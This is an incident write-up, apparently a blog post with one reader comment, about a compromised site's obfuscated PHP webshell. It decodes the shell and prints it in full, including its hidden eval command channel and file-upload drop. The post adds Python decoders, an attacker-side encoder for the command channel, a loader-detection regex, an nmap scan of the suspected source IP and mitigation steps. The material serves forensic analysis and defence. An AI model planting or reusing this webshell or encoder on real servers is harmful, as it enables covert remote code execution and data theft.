When a PHP file contains eval + gzinflate + base64_decode, expect it to be malicious in nature: that combination is the standard way to hide a payload from casual inspection (base64 to keep it printable, raw DEFLATE to shrink it, eval to run the result). Decode it offline with a decoder, or by swapping the outermost eval for an echo in a copy; never run the sample on the web server itself.
eval gzinflate base64_decode PHP decoder:
http://www.tareeinternet.com/scripts/decrypt.php
After decoding the file, we get a webshell with file upload capability:
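A static decoder for this kind of file, added here as an example and not code from this post or from the linked decoder page: it peels nested eval(gzinflate(base64_decode('...'))) layers without executing any PHP, by replacing each eval() call with the source it would have run. The sample it decodes is constructed inline (a harmless echo wrapped three times); the helper names and the layer regex are this example's own.

```python
import base64
import re
import zlib

# One obfuscation layer of the form eval(gzinflate(base64_decode('...')));
# tolerating whitespace and either quote style; group 1 is the base64 blob.
LAYER_RE = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)\s*\)\s*;?"""
)


def php_gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() consumes raw DEFLATE (no zlib/gzip header): wbits = -15."""
    return zlib.decompress(data, -15)


def php_gzdeflate(data: bytes) -> bytes:
    """Counterpart of PHP gzdeflate(); used here only to build the constructed sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()


def peel_layers(source: str, max_layers: int = 50) -> tuple[str, int]:
    """Statically unwrap nested eval(gzinflate(base64_decode(...))) layers.

    Nothing is executed: each eval(...) call is replaced by the PHP it would have
    run, until no layer matches or a blob fails to decode. Returns
    (decoded source, number of layers removed); max_layers bounds pathological input.
    """
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.search(source)
        if m is None:
            break
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            inner = php_gzinflate(base64.b64decode(blob, validate=True))
        except (ValueError, zlib.error):
            break  # malformed, or not really gzinflate data: stop and keep what we have
        source = source[:m.start()] + inner.decode("utf-8", "replace") + source[m.end():]
        layers += 1
    return source, layers


def wrap_layer(php: str) -> str:
    """Constructed helper mimicking a one-layer obfuscator, only to build the sample."""
    blob = base64.b64encode(php_gzdeflate(php.encode())).decode()
    return f"eval(gzinflate(base64_decode('{blob}')));"


# Constructed sample (not the shell from this post): a harmless echo wrapped in
# three layers, which is what the eval/gzinflate/base64_decode signature looks like.
INNER = "echo 'hello';"
SAMPLE = "<?php " + wrap_layer(wrap_layer(wrap_layer(INNER))) + " ?>"

if __name__ == "__main__":
    decoded, n = peel_layers(SAMPLE)
    print(f"removed {n} layers:\n{decoded}")
```

Real samples vary the wrapper (gzuncompress, str_rot13, strrev, variable function names, split strings), so treat LAYER_RE as the starting pattern and extend it per sample; the stop-on-failure branch is what keeps a mismatch from silently producing garbage.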
<?php
// Decoded payload (the webshell). Every call is prefixed with @ and error
// reporting is switched off so that nothing it does ends up in the PHP logs.
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_GET['r'])) {
    // Liveness check: echoes back whatever ?r= carries, so the operator can
    // confirm the shell is still in place.
    print $_GET['r'];
} elseif (isset($_POST['e'])) {
    // Command channel: e = str_rot13(base64(strrev(str_rot13(base64(php)))))
    // is unwrapped in reverse order and the result handed to eval().
    eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
    // Upload channel: a request carrying "Content-Encoding: binary" has its raw
    // body appended, base64-encoded and keyed by client IP, to the file "tmpfile".
    $data = file_get_contents('php://input');
    if (strlen($data) > 0) print 'STATUS-IMPORT-OK';
    if (strlen($data) > 12) {
        $fp=@fopen('tmpfile','a');
        @flock($fp, LOCK_EX);
        @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
        @flock($fp, LOCK_UN);
        @fclose($fp);
    }
}
exit;
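When working the incident, the two things an analyst wants from this shell are the commands that were sent through the POST e= channel (recoverable from web logs or a capture) and the bodies the upload channel appended to "tmpfile". The following is an added example, not code from the post: it reverses the shell's exact decode chain, provides the attacker-side inverse so the traffic shape can be recognised and the decoder tested, and parses the tmpfile drop format. The sample tmpfile content is constructed (documentation IPs, harmless bodies), and the function names are this example's own.

```python
import base64
import re


def rot13_bytes(data: bytes) -> bytes:
    """PHP str_rot13(): rotate ASCII letters only, leave every other byte alone."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


def php_base64_decode(data: bytes) -> bytes:
    """PHP base64_decode() in its default non-strict mode: characters outside the
    alphabet are skipped and missing padding is tolerated."""
    clean = re.sub(rb"[^A-Za-z0-9+/=]", b"", data).rstrip(b"=")
    clean += b"=" * (-len(clean) % 4)
    return base64.b64decode(clean)


def decode_post_e(e: str) -> bytes:
    """Reverse the shell's command channel,
    eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))),
    given the raw POST parameter e; returns the PHP the shell would eval()."""
    stage = php_base64_decode(rot13_bytes(e.encode()))  # str_rot13, base64_decode
    stage = rot13_bytes(stage[::-1])                    # strrev, str_rot13
    return php_base64_decode(stage)                     # base64_decode -> eval() input


def encode_post_e(php: bytes) -> str:
    """Attacker-side inverse: what a client must POST as e= to run php.
    Here only to show the traffic shape and to test decode_post_e()."""
    stage = base64.b64encode(php)
    stage = rot13_bytes(stage)[::-1]
    return rot13_bytes(base64.b64encode(stage)).decode()


def parse_tmpfile(text: str) -> list[tuple[str, bytes]]:
    """Parse the shell's upload drop ("tmpfile"): one record per line, written as
    REMOTE_ADDR <tab> base64(request body) CRLF. Returns (client ip, body) pairs."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        addr, _, blob = line.partition("\t")
        records.append((addr, php_base64_decode(blob.encode())))
    return records


# Constructed sample drop file (documentation IPs, not data from the incident).
SAMPLE_TMPFILE = (
    "192.0.2.10\t" + base64.b64encode(b"<?php phpinfo(); ?>").decode() + "\r\n"
    + "198.51.100.7\t" + base64.b64encode(b"id; uname -a").decode() + "\r\n"
)

if __name__ == "__main__":
    e = encode_post_e(b"echo 'ping';")
    print("POST e=", e)
    print("decodes to:", decode_post_e(e))
    for ip, body in parse_tmpfile(SAMPLE_TMPFILE):
        print(ip, body)
```

Because rot13 maps base64 letters to other letters and leaves +, / and = untouched, the encoded e= value still looks like base64 in the access log; a long POST to an odd PHP file whose body is a single base64-ish parameter named e is the log shape to hunt for.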
Updates 25 Jan 2013:
Findings from the log indicate that three months ago someone from 80.237.132.113 uploaded the webshell using the FTP account.
The possibility of entry via FTP brute force is very high, as I know the original password was not that complex.
80.237.132.113 is a web server under construction.
80.237.132.113 could just be another victim of the intruder. Nmap scan of that host:
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
25/tcp open smtp Exim smtpd
80/tcp open http Apache httpd
110/tcp open pop3 Dovecot pop3d
137/tcp open netbios-ns?
138/tcp open netbios-dgm?
139/tcp open netbios-ssn?
143/tcp open imap Dovecot imapd
465/tcp open ssl/smtp Exim smtpd 4.X
587/tcp open smtp Exim
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
2195/tcp open unknown
3306/tcp open mysql MySQL 5.5.28-1~dotdeb.0-log
Mitigation:
Change the FTP password (and any other account where it was reused), and remove the shell together with its "tmpfile" drop.
Monitor the web root for new or modified files; any file containing eval + gzinflate + base64_decode is an indicator worth pulling for analysis.
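One way to put "monitor files" into practice, added here as an example rather than anything from the post: snapshot SHA-256 hashes of the web root, diff two snapshots to find added, removed and modified files, and check the changed ones for the eval-fed-from-a-decoder signature this post is about. The demo scenario is constructed in a temporary directory (a baseline site, then a dropped loader and an edited file); the file names and the signature regex are this example's own.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Loader signature from this post: eval() fed straight from an unpacking/decoding call.
LOADER_RE = re.compile(rb"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> dict[str, str]:
    """Map every file under root (path relative to root) to its SHA-256."""
    rootp = Path(root)
    return {
        str(p.relative_to(rootp)): sha256_file(p)
        for p in sorted(rootp.rglob("*"))
        if p.is_file()
    }


def diff_snapshots(before: dict[str, str], after: dict[str, str]) -> dict[str, list[str]]:
    """Classify the changes between two snapshots."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in set(before) & set(after) if before[p] != after[p]),
    }


def flag_suspicious(root: str, relpaths: list[str]) -> list[str]:
    """Return the subset of relpaths whose content carries the loader signature."""
    return [p for p in relpaths if LOADER_RE.search(Path(root, p).read_bytes())]


def demo() -> dict:
    """Constructed scenario: baseline a tiny web root, then drop a loader named
    default.php (the name reported in a comment on this post) and edit a
    legitimate file, and see which changes the monitor flags."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text("<?php echo 'site'; ?>\n")
        before = snapshot(root)
        # Constructed loader: the base64 blob is not a real payload, only the signature matters.
        Path(root, "default.php").write_text("<?php eval(gzinflate(base64_decode('e30='))); ?>\n")
        Path(root, "index.php").write_text("<?php echo 'site'; ?>\n<!-- edited -->\n")
        after = snapshot(root)
        changes = diff_snapshots(before, after)
        flagged = flag_suspicious(root, changes["added"] + changes["modified"])
        return {"changes": changes, "flagged": flagged}


if __name__ == "__main__":
    print(demo())
```

Store the baseline snapshot off the server (an attacker who can write default.php can edit a baseline kept beside it), and run the diff from cron; the hash diff catches changes the signature does not, such as a legitimate file edited to include the shell.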
Just came across the same EXACT thing on a client site. The code was not really well hidden. It was in the web root with the filename "default.php".